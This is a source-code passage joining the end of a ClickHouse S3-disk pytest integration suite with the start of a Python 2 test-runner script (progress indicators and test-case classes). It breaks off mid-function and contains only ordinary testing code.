node = cluster.instances["node"]
minio = cluster.minio_client
node.query("DROP TABLE IF EXISTS s3_test NO DELAY")
try:
wait_for_delete_s3_objects(cluster, 0)
finally:
# Remove extra objects to prevent tests cascade failing
for obj in list(minio.list_objects(cluster.minio_bucket, 'data/')):
minio.remove_object(cluster.minio_bucket, obj.object_name)
@pytest.mark.parametrize(
"min_rows_for_wide_part,files_per_part",
[
(0, FILES_OVERHEAD_PER_PART_WIDE),
(8192, FILES_OVERHEAD_PER_PART_COMPACT)
]
)
def test_simple_insert_select(cluster, min_rows_for_wide_part, files_per_part):
create_table(cluster, "s3_test", additional_settings="min_rows_for_wide_part={}".format(min_rows_for_wide_part))
node = cluster.instances["node"]
minio = cluster.minio_client
values1 = generate_values('2020-01-03', 4096)
node.query("INSERT INTO s3_test VALUES {}".format(values1))
assert node.query("SELECT * FROM s3_test order by dt, id FORMAT Values") == values1
assert len(list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + files_per_part
values2 = generate_values('2020-01-04', 4096)
node.query("INSERT INTO s3_test VALUES {}".format(values2))
assert node.query("SELECT * FROM s3_test ORDER BY dt, id FORMAT Values") == values1 + "," + values2
assert len(list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + files_per_part * 2
assert node.query("SELECT count(*) FROM s3_test where id = 1 FORMAT Values") == "(2)"
@pytest.mark.parametrize(
"merge_vertical", [False, True]
)
def test_insert_same_partition_and_merge(cluster, merge_vertical):
settings = None
if merge_vertical:
settings = """
vertical_merge_algorithm_min_rows_to_activate=0,
vertical_merge_algorithm_min_columns_to_activate=0
"""
create_table(cluster, "s3_test", additional_settings=settings)
node = cluster.instances["node"]
minio = cluster.minio_client
node.query("SYSTEM STOP MERGES s3_test")
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 1024)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 2048)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 1024, -1)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 2048, -1)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096, -1)))
assert node.query("SELECT sum(id) FROM s3_test FORMAT Values") == "(0)"
assert node.query("SELECT count(distinct(id)) FROM s3_test FORMAT Values") == "(8192)"
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD_PER_PART_WIDE * 6 + FILES_OVERHEAD
node.query("SYSTEM START MERGES s3_test")
# Wait for merges and old parts deletion
for attempt in range(0, 10):
parts_count = node.query("SELECT COUNT(*) FROM system.parts WHERE table = 's3_test' FORMAT Values")
if parts_count == "(1)":
break
if attempt == 9:
assert parts_count == "(1)"
time.sleep(1)
assert node.query("SELECT sum(id) FROM s3_test FORMAT Values") == "(0)"
assert node.query("SELECT count(distinct(id)) FROM s3_test FORMAT Values") == "(8192)"
wait_for_delete_s3_objects(cluster, FILES_OVERHEAD_PER_PART_WIDE + FILES_OVERHEAD)
def test_alter_table_columns(cluster):
create_table(cluster, "s3_test")
node = cluster.instances["node"]
minio = cluster.minio_client
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096, -1)))
node.query("ALTER TABLE s3_test ADD COLUMN col1 UInt64 DEFAULT 1")
# To ensure parts have merged
node.query("OPTIMIZE TABLE s3_test")
assert node.query("SELECT sum(col1) FROM s3_test FORMAT Values") == "(8192)"
assert node.query("SELECT sum(col1) FROM s3_test WHERE id > 0 FORMAT Values") == "(4096)"
wait_for_delete_s3_objects(cluster, FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE + FILES_OVERHEAD_PER_COLUMN)
node.query("ALTER TABLE s3_test MODIFY COLUMN col1 String", settings={"mutations_sync": 2})
assert node.query("SELECT distinct(col1) FROM s3_test FORMAT Values") == "('1')"
# and file with mutation
wait_for_delete_s3_objects(cluster, FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE + FILES_OVERHEAD_PER_COLUMN + 1)
node.query("ALTER TABLE s3_test DROP COLUMN col1", settings={"mutations_sync": 2})
# and 2 files with mutations
wait_for_delete_s3_objects(cluster, FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE + 2)
def test_attach_detach_partition(cluster):
create_table(cluster, "s3_test")
node = cluster.instances["node"]
minio = cluster.minio_client
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-04', 4096)))
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(8192)"
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 2
node.query("ALTER TABLE s3_test DETACH PARTITION '2020-01-03'")
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(4096)"
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 2
node.query("ALTER TABLE s3_test ATTACH PARTITION '2020-01-03'")
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(8192)"
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 2
node.query("ALTER TABLE s3_test DROP PARTITION '2020-01-03'")
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(4096)"
assert len(list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE
node.query("ALTER TABLE s3_test DETACH PARTITION '2020-01-04'")
node.query("ALTER TABLE s3_test DROP DETACHED PARTITION '2020-01-04'", settings={"allow_drop_detached": 1})
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(0)"
assert len(list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD
def test_move_partition_to_another_disk(cluster):
create_table(cluster, "s3_test")
node = cluster.instances["node"]
minio = cluster.minio_client
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-04', 4096)))
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(8192)"
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 2
node.query("ALTER TABLE s3_test MOVE PARTITION '2020-01-04' TO DISK 'hdd'")
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(8192)"
assert len(list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE
node.query("ALTER TABLE s3_test MOVE PARTITION '2020-01-04' TO DISK 's3'")
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(8192)"
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 2
def test_table_manipulations(cluster):
create_table(cluster, "s3_test")
node = cluster.instances["node"]
minio = cluster.minio_client
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-04', 4096)))
node.query("RENAME TABLE s3_test TO s3_renamed")
assert node.query("SELECT count(*) FROM s3_renamed FORMAT Values") == "(8192)"
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 2
node.query("RENAME TABLE s3_renamed TO s3_test")
assert node.query("CHECK TABLE s3_test FORMAT Values") == "(1)"
node.query("DETACH TABLE s3_test")
node.query("ATTACH TABLE s3_test")
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(8192)"
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 2
node.query("TRUNCATE TABLE s3_test")
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(0)"
assert len(list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD
def test_move_replace_partition_to_another_table(cluster):
create_table(cluster, "s3_test")
node = cluster.instances["node"]
minio = cluster.minio_client
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-04', 4096)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-05', 4096, -1)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-06', 4096, -1)))
assert node.query("SELECT sum(id) FROM s3_test FORMAT Values") == "(0)"
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(16384)"
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 4
create_table(cluster, "s3_clone")
node.query("ALTER TABLE s3_test MOVE PARTITION '2020-01-03' TO TABLE s3_clone")
node.query("ALTER TABLE s3_test MOVE PARTITION '2020-01-05' TO TABLE s3_clone")
assert node.query("SELECT sum(id) FROM s3_test FORMAT Values") == "(0)"
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(8192)"
assert node.query("SELECT sum(id) FROM s3_clone FORMAT Values") == "(0)"
assert node.query("SELECT count(*) FROM s3_clone FORMAT Values") == "(8192)"
# Number of objects in S3 should be unchanged.
assert len(list(
minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD * 2 + FILES_OVERHEAD_PER_PART_WIDE * 4
# Add new partitions to source table, but with different values and replace them from copied table.
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096, -1)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-05', 4096)))
assert node.query("SELECT sum(id) FROM s3_test FORMAT Values") == "(0)"
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(16384)"
assert len(list(
minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD * 2 + FILES_OVERHEAD_PER_PART_WIDE * 6
node.query("ALTER TABLE s3_test REPLACE PARTITION '2020-01-03' FROM s3_clone")
node.query("ALTER TABLE s3_test REPLACE PARTITION '2020-01-05' FROM s3_clone")
assert node.query("SELECT sum(id) FROM s3_test FORMAT Values") == "(0)"
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(16384)"
assert node.query("SELECT sum(id) FROM s3_clone FORMAT Values") == "(0)"
assert node.query("SELECT count(*) FROM s3_clone FORMAT Values") == "(8192)"
# Wait for outdated partitions deletion.
wait_for_delete_s3_objects(cluster, FILES_OVERHEAD * 2 + FILES_OVERHEAD_PER_PART_WIDE * 4)
node.query("DROP TABLE s3_clone NO DELAY")
assert node.query("SELECT sum(id) FROM s3_test FORMAT Values") == "(0)"
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(16384)"
# Data should remain in S3
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 4
node.query("ALTER TABLE s3_test FREEZE")
# Number S3 objects should be unchanged.
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 4
node.query("DROP TABLE s3_test NO DELAY")
# Backup data should remain in S3.
wait_for_delete_s3_objects(cluster, FILES_OVERHEAD_PER_PART_WIDE * 4)
for obj in list(minio.list_objects(cluster.minio_bucket, 'data/')):
minio.remove_object(cluster.minio_bucket, obj.object_name)
def test_freeze_unfreeze(cluster):
create_table(cluster, "s3_test")
node = cluster.instances["node"]
minio = cluster.minio_client
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096)))
node.query("ALTER TABLE s3_test FREEZE WITH NAME 'backup1'")
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-04', 4096)))
node.query("ALTER TABLE s3_test FREEZE WITH NAME 'backup2'")
node.query("TRUNCATE TABLE s3_test")
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 2
# Unfreeze single partition from backup1.
node.query("ALTER TABLE s3_test UNFREEZE PARTITION '2020-01-03' WITH NAME 'backup1'")
# Unfreeze all partitions from backup2.
node.query("ALTER TABLE s3_test UNFREEZE WITH NAME 'backup2'")
# Data should be removed from S3.
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD
def test_s3_disk_apply_new_settings(cluster):
create_table(cluster, "s3_test")
node = cluster.instances["node"]
def get_s3_requests():
node.query("SYSTEM FLUSH LOGS")
return int(node.query("SELECT value FROM system.events WHERE event='S3WriteRequestsCount'"))
s3_requests_before = get_s3_requests()
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096)))
s3_requests_to_write_partition = get_s3_requests() - s3_requests_before
# Force multi-part upload mode.
replace_config("<s3_max_single_part_upload_size>33554432</s3_max_single_part_upload_size>",
"<s3_max_single_part_upload_size>0</s3_max_single_part_upload_size>")
node.query("SYSTEM RELOAD CONFIG")
s3_requests_before = get_s3_requests()
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-04', 4096, -1)))
# There should be 3 times more S3 requests because multi-part upload mode uses 3 requests to upload object.
assert get_s3_requests() - s3_requests_before == s3_requests_to_write_partition * 3
def test_s3_disk_restart_during_load(cluster):
create_table(cluster, "s3_test")
node = cluster.instances["node"]
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-04', 1024 * 1024)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-05', 1024 * 1024, -1)))
def read():
for ii in range(0, 20):
logging.info("Executing %d query", ii)
assert node.query("SELECT sum(id) FROM s3_test FORMAT Values") == "(0)"
logging.info("Query %d executed", ii)
time.sleep(0.2)
def restart_disk():
for iii in range(0, 5):
logging.info("Restarting disk, attempt %d", iii)
node.query("SYSTEM RESTART DISK s3")
logging.info("Disk restarted, attempt %d", iii)
time.sleep(0.5)
threads = []
for i in range(0, 4):
threads.append(SafeThread(target=read))
threads.append(SafeThread(target=restart_disk))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
|
test.py
|
#!/usr/bin/env python
#
# Copyright 2008 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import imp
import logging
import optparse
import os
import re
import signal
import subprocess
import sys
import tempfile
import time
import threading
import utils
import multiprocessing
import errno
import copy
import ast
from os.path import join, dirname, abspath, basename, isdir, exists
from datetime import datetime
from Queue import Queue, Empty
logger = logging.getLogger('testrunner')
skip_regex = re.compile(r'# SKIP\S*\s+(.*)', re.IGNORECASE)
VERBOSE = False
os.environ['NODE_OPTIONS'] = ''
# ---------------------------------------------
# --- P r o g r e s s I n d i c a t o r s ---
# ---------------------------------------------
class ProgressIndicator(object):
def __init__(self, cases, flaky_tests_mode):
self.cases = cases
self.flaky_tests_mode = flaky_tests_mode
self.parallel_queue = Queue(len(cases))
self.sequential_queue = Queue(len(cases))
for case in cases:
if case.parallel:
self.parallel_queue.put_nowait(case)
else:
self.sequential_queue.put_nowait(case)
self.succeeded = 0
self.remaining = len(cases)
self.total = len(cases)
self.failed = [ ]
self.flaky_failed = [ ]
self.crashed = 0
self.lock = threading.Lock()
self.shutdown_event = threading.Event()
def PrintFailureHeader(self, test):
if test.IsNegative():
negative_marker = '[negative] '
else:
negative_marker = ''
print "=== %(label)s %(negative)s===" % {
'label': test.GetLabel(),
'negative': negative_marker
}
print "Path: %s" % "/".join(test.path)
def Run(self, tasks):
self.Starting()
threads = []
# Spawn N-1 threads and then use this thread as the last one.
# That way -j1 avoids threading altogether which is a nice fallback
# in case of threading problems.
for i in xrange(tasks - 1):
thread = threading.Thread(target=self.RunSingle, args=[True, i + 1])
threads.append(thread)
thread.start()
try:
self.RunSingle(False, 0)
# Wait for the remaining threads
for thread in threads:
# Use a timeout so that signals (ctrl-c) will be processed.
thread.join(timeout=10000000)
except (KeyboardInterrupt, SystemExit), e:
self.shutdown_event.set()
except Exception, e:
# If there's an exception we schedule an interruption for any
# remaining threads.
self.shutdown_event.set()
# ...and then reraise the exception to bail out
raise
self.Done()
return not self.failed
def RunSingle(self, parallel, thread_id):
while not self.shutdown_event.is_set():
try:
test = self.parallel_queue.get_nowait()
except Empty:
if parallel:
return
try:
test = self.sequential_queue.get_nowait()
except Empty:
return
case = test.case
case.thread_id = thread_id
self.lock.acquire()
self.AboutToRun(case)
self.lock.release()
try:
start = datetime.now()
output = case.Run()
# SmartOS has a bug that causes unexpected ECONNREFUSED errors.
# See https://smartos.org/bugview/OS-2767
# If ECONNREFUSED on SmartOS, retry the test one time.
if (output.UnexpectedOutput() and
sys.platform == 'sunos5' and
'ECONNREFUSED' in output.output.stderr):
output = case.Run()
output.diagnostic.append('ECONNREFUSED received, test retried')
case.duration = (datetime.now() - start)
except IOError, e:
return
if self.shutdown_event.is_set():
return
self.lock.acquire()
if output.UnexpectedOutput():
if FLAKY in output.test.outcomes and self.flaky_tests_mode == DONTCARE:
self.flaky_failed.append(output)
else:
self.failed.append(output)
if output.HasCrashed():
self.crashed += 1
else:
self.succeeded += 1
self.remaining -= 1
self.HasRun(output)
self.lock.release()
def EscapeCommand(command):
parts = []
for part in command:
if ' ' in part:
# Escape spaces. We may need to escape more characters for this
# to work properly.
parts.append('"%s"' % part)
else:
parts.append(part)
return " ".join(parts)
class SimpleProgressIndicator(ProgressIndicator):
def Starting(self):
print 'Running %i tests' % len(self.cases)
def Done(self):
print
for failed in self.failed:
self.PrintFailureHeader(failed.test)
if failed.output.stderr:
print "--- stderr ---"
print failed.output.stderr.strip()
if failed.output.stdout:
print "--- stdout ---"
print failed.output.stdout.strip()
print "Command: %s" % EscapeCommand(failed.command)
if failed.HasCrashed():
print "--- %s ---" % PrintCrashed(failed.output.exit_code)
if failed.HasTimedOut():
print "--- TIMEOUT ---"
if len(self.failed) == 0:
print "==="
print "=== All tests succeeded"
print "==="
else:
print
print "==="
print "=== %i tests failed" % len(self.failed)
if self.crashed > 0:
print "=== %i tests CRASHED" % self.crashed
print "==="
class VerboseProgressIndicator(SimpleProgressIndicator):
def AboutToRun(self, case):
print 'Starting %s...' % case.GetLabel()
sys.stdout.flush()
def HasRun(self, output):
if output.UnexpectedOutput():
if output.HasCrashed():
outcome = 'CRASH'
else:
outcome = 'FAIL'
else:
outcome = 'pass'
print 'Done running %s: %s' % (output.test.GetLabel(), outcome)
class DotsProgressIndicator(SimpleProgressIndicator):
def AboutToRun(self, case):
pass
def HasRun(self, output):
total = self.succeeded + len(self.failed)
if (total > 1) and (total % 50 == 1):
sys.stdout.write('\n')
if output.UnexpectedOutput():
if output.HasCrashed():
sys.stdout.write('C')
sys.stdout.flush()
elif output.HasTimedOut():
sys.stdout.write('T')
sys.stdout.flush()
else:
sys.stdout.write('F')
sys.stdout.flush()
else:
sys.stdout.write('.')
sys.stdout.flush()
class TapProgressIndicator(SimpleProgressIndicator):
def _printDiagnostic(self):
logger.info(' severity: %s', self.severity)
self.exitcode and logger.info(' exitcode: %s', self.exitcode)
logger.info(' stack: |-')
for l in self.traceback.splitlines():
logger.info(' ' + l)
def Starting(self):
logger.info('TAP version 13')
logger.info('1..%i' % len(self.cases))
self._done = 0
def AboutToRun(self, case):
pass
def HasRun(self, output):
self._done += 1
self.traceback = ''
self.severity = 'ok'
self.exitcode = ''
# Print test name as (for example) "parallel/test-assert". Tests that are
# scraped from the addons documentation are all named test.js, making it
# hard to decipher what test is running when only the filename is printed.
prefix = abspath(join(dirname(__file__), '../test')) + os.sep
command = output.command[-1]
command = NormalizePath(command, prefix)
if output.UnexpectedOutput():
status_line = 'not ok %i %s' % (self._done, command)
self.severity = 'fail'
self.exitcode = output.output.exit_code
self.traceback = output.output.stdout + output.output.stderr
if FLAKY in output.test.outcomes and self.flaky_tests_mode == DONTCARE:
status_line = status_line + ' # TODO : Fix flaky test'
self.severity = 'flaky'
logger.info(status_line)
if output.HasCrashed():
self.severity = 'crashed'
elif output.HasTimedOut():
self.severity = 'fail'
else:
skip = skip_regex.search(output.output.stdout)
if skip:
logger.info(
'ok %i %s # skip %s' % (self._done, command, skip.group(1)))
else:
status_line = 'ok %i %s' % (self._done, command)
if FLAKY in output.test.outcomes:
status_line = status_line + ' # TODO : Fix flaky test'
logger.info(status_line)
if output.diagnostic:
self.severity = 'ok'
self.traceback = output.diagnostic
duration = output.test.duration
# total_seconds() was added in 2.7
total_seconds = (duration.microseconds +
(duration.seconds + duration.days * 24 * 3600) * 10**6) / 10**6
# duration_ms is measured in seconds and is read as such by TAP parsers.
# It should read as "duration including ms" rather than "duration in ms"
logger.info(' ---')
logger.info(' duration_ms: %d.%d' %
(total_seconds, duration.microseconds / 1000))
if self.severity is not 'ok' or self.traceback is not '':
if output.HasTimedOut():
self.traceback = 'timeout\n' + output.output.stdout + output.output.stderr
self._printDiagnostic()
logger.info(' ...')
def Done(self):
pass
class DeoptsCheckProgressIndicator(SimpleProgressIndicator):
def Starting(self):
pass
def AboutToRun(self, case):
pass
def HasRun(self, output):
# Print test name as (for example) "parallel/test-assert". Tests that are
# scraped from the addons documentation are all named test.js, making it
# hard to decipher what test is running when only the filename is printed.
prefix = abspath(join(dirname(__file__), '../test')) + os.sep
command = output.command[-1]
command = NormalizePath(command, prefix)
stdout = output.output.stdout.strip()
printed_file = False
for line in stdout.splitlines():
if (line.startswith("[aborted optimiz") or \
line.startswith("[disabled optimiz")) and \
("because:" in line or "reason:" in line):
if not printed_file:
printed_file = True
print '==== %s ====' % command
self.failed.append(output)
print ' %s' % line
def Done(self):
pass
class CompactProgressIndicator(ProgressIndicator):
def __init__(self, cases, flaky_tests_mode, templates):
super(CompactProgressIndicator, self).__init__(cases, flaky_tests_mode)
self.templates = templates
self.last_status_length = 0
self.start_time = time.time()
def Starting(self):
pass
def Done(self):
self.PrintProgress('Done')
def AboutToRun(self, case):
self.PrintProgress(case.GetLabel())
def HasRun(self, output):
if output.UnexpectedOutput():
self.ClearLine(self.last_status_length)
self.PrintFailureHeader(output.test)
stdout = output.output.stdout.strip()
if len(stdout):
print self.templates['stdout'] % stdout
stderr = output.output.stderr.strip()
if len(stderr):
print self.templates['stderr'] % stderr
print "Command: %s" % EscapeCommand(output.command)
if output.HasCrashed():
print "--- %s ---" % PrintCrashed(output.output.exit_code)
if output.HasTimedOut():
print "--- TIMEOUT ---"
def Truncate(self, str, length):
if length and (len(str) > (length - 3)):
return str[:(length-3)] + "..."
else:
return str
def PrintProgress(self, name):
self.ClearLine(self.last_status_length)
elapsed = time.time() - self.start_time
status = self.templates['status_line'] % {
'passed': self.succeeded,
'remaining': (((self.total - self.remaining) * 100) // self.total),
'failed': len(self.failed),
'test': name,
'mins': int(elapsed) / 60,
'secs': int(elapsed) % 60
}
status = self.Truncate(status, 78)
self.last_status_length = len(status)
print status,
sys.stdout.flush()
class ColorProgressIndicator(CompactProgressIndicator):
def __init__(self, cases, flaky_tests_mode):
templates = {
'status_line': "[%(mins)02i:%(secs)02i|\033[34m%%%(remaining) 4d\033[0m|\033[32m+%(passed) 4d\033[0m|\033[31m-%(failed) 4d\033[0m]: %(test)s",
'stdout': "\033[1m%s\033[0m",
'stderr': "\033[31m%s\033[0m",
}
super(ColorProgressIndicator, self).__init__(cases, flaky_tests_mode, templates)
def ClearLine(self, last_line_length):
print "\033[1K\r",
class MonochromeProgressIndicator(CompactProgressIndicator):
def __init__(self, cases, flaky_tests_mode):
templates = {
'status_line': "[%(mins)02i:%(secs)02i|%%%(remaining) 4d|+%(passed) 4d|-%(failed) 4d]: %(test)s",
'stdout': '%s',
'stderr': '%s',
'clear': lambda last_line_length: ("\r" + (" " * last_line_length) + "\r"),
'max_length': 78
}
super(MonochromeProgressIndicator, self).__init__(cases, flaky_tests_mode, templates)
def ClearLine(self, last_line_length):
print ("\r" + (" " * last_line_length) + "\r"),
PROGRESS_INDICATORS = {
'verbose': VerboseProgressIndicator,
'dots': DotsProgressIndicator,
'color': ColorProgressIndicator,
'tap': TapProgressIndicator,
'mono': MonochromeProgressIndicator,
'deopts': DeoptsCheckProgressIndicator
}
# -------------------------
# --- F r a m e w o r k ---
# -------------------------
class CommandOutput(object):
def __init__(self, exit_code, timed_out, stdout, stderr):
self.exit_code = exit_code
self.timed_out = timed_out
self.stdout = stdout
self.stderr = stderr
self.failed = None
class TestCase(object):
def __init__(self, context, path, arch, mode):
self.path = path
self.context = context
self.duration = None
self.arch = arch
self.mode = mode
self.parallel = False
self.disable_core_files = False
self.thread_id = 0
def IsNegative(self):
return self.context.expect_fail
def CompareTime(self, other):
return cmp(other.duration, self.duration)
def DidFail(self, output):
if output.failed is None:
output.failed = self.IsFailureOutput(output)
return output.failed
def IsFailureOutput(self, output):
return output.exit_code != 0
def GetSource(self):
return "(no source available)"
def RunCommand(self, command, env):
full_command = self.context.processor(command)
output = Execute(full_command,
self.context,
self.context.GetTimeout(self.mode),
env,
disable_core_files = self.disable_core_files)
self.Cleanup()
return TestOutput(self,
full_command,
output,
self.context.store_unexpected_output)
def BeforeRun(self):
pass
def AfterRun(self, result):
pass
def Run(self):
self.BeforeRun()
try:
result = self.RunCommand(self.GetCommand(), {
"TEST_THREAD_ID": "%d" % self.thread_id
})
finally:
# Tests can leave the tty in non-blocking mode. If the test runner
# tries to print to stdout/stderr after that and the tty buffer is
# full, it'll die with a EAGAIN OSError. Ergo, put the tty back in
# blocking mode before proceeding.
if sys.platform != 'win32':
from fcntl import fcntl, F_GETFL, F_SETFL
from os import O_NONBLOCK
for fd in 0,1,2: fcntl(fd, F_SETFL, ~O_NONBLOCK & fcntl(fd, F_GETFL))
self.AfterRun(result)
return result
def Cleanup(self):
return
class TestOutput(object):
def __init__(self, test, command, output, store_unexpected_output):
self.test = test
self.command = command
self.output = output
self.store_unexpected_output = store_unexpected_output
self.diagnostic = []
def UnexpectedOutput(self):
if self.HasCrashed():
outcome = CRASH
elif self.HasTimedOut():
outcome = TIMEOUT
elif self.HasFailed():
outcome = FAIL
else:
outcome = PASS
return not outcome in self.test.outcomes
def HasCrashed(self):
if utils.IsWindows():
return 0x80000000 & self.output.exit_code and not (0x3FFFFF00 & self.output.exit_code)
else:
# Timed out tests will have exit_code -signal.SIGTERM.
if self.output.timed_out:
return False
return self.output.exit_code < 0
def HasTimedOut(self):
return self.output.timed_out;
def HasFailed(self):
execution_failed = self.test.DidFail(self.output)
if self.test.IsNegative():
return not execution_failed
else:
return execution_failed
def KillProcessWithID(pid, signal_to_send=signal.SIGTERM):
if utils.IsWindows():
os.popen('taskkill /T /F /PID %d' % pid)
else:
os.kill(pid, signal_to_send)
MAX_SLEEP_TIME = 0.1
INITIAL_SLEEP_TIME = 0.0001
SLEEP_TIME_FACTOR = 1.25
SEM_INVALID_VALUE = -1
SEM_NOGPFAULTERRORBOX = 0x0002 # Microsoft Platform SDK WinBase.h
def Win32SetErrorMode(mode):
prev_error_mode = SEM_INVALID_VALUE
try:
import ctypes
prev_error_mode = ctypes.windll.kernel32.SetErrorMode(mode);
except ImportError:
pass
return prev_error_mode
def KillTimedOutProcess(context, pid):
signal_to_send = signal.SIGTERM
if context.abort_on_timeout:
# Using SIGABRT here allows the OS to generate a core dump that can be
# looked at post-mortem, which helps for investigating failures that are
# difficult to reproduce.
signal_to_send = signal.SIGABRT
KillProcessWithID(pid, signal_to_send)
def RunProcess(context, timeout, args, **rest):
if context.verbose: print "#", " ".join(args)
popen_args = args
prev_error_mode = SEM_INVALID_VALUE;
if utils.IsWindows():
if context.suppress_dialogs:
# Try to change the error mode to avoid dialogs on fatal errors. Don't
# touch any existing error mode flags by merging the existing error mode.
# See http://blogs.msdn.com/oldnewthing/archive/2004/07/27/198410.aspx.
error_mode = SEM_NOGPFAULTERRORBOX;
prev_error_mode = Win32SetErrorMode(error_mode);
Win32SetErrorMode(error_mode | prev_error_mode);
faketty = rest.pop('faketty', False)
pty_out = rest.pop('pty_out')
